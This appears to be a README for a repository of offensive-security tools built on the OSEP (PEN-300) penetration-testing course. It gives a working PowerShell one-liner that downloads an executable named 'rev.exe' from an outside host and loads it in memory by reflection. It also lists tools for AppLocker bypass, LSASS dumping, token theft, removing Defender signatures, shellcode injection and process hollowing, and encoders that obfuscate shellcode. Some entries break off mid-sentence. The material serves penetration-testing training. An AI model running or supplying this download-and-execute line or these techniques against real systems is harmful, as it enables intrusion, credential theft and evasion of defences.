OSEP Code Snippets
Code examples are provided as-is, without any form of warranty. Based on Offensive Security's PEN-300 course.
Classes and methods are public, so most binaries should allow for reflective loading as below.
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe') $assem = [System.Reflection.Assembly]::Load($data) [rev.Program]::Main("".Split())
|AppLocker Bypass PowerShell Runspace (C#)||Base binary for an applocker bypass using a combination of
|Fileless Lateral Movement (C#)||Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as
|Linux Shellcode Loaders (C)||Various C-based shellcode loaders, including base binaries for library hijacking.|
|MiniDump (C# & PS1)||A simple binary to Dump LSASS to
|MSSQL (C#)||An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|
|PrintSpoofer.NET (C#)||Steals the token of the incoming authentication forced with the PrintSpooler exploit, and use that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.|
|ROT Shellcode Encoder (C#)||A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.|
|Sections Shellcode Process Injector (C#)||Injects and runs shellcode using
|Shellcode Process Hollowing (C#)||Hollows a
|Shellcode Process Injector (C# & PS1)||Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as native PowerShell script (though it is a bit simpler).|
|Simple Shellcode Runner (C# & PS1 & VBA)||The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.|
|XOR Shellcode Encoder (C#)||A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.|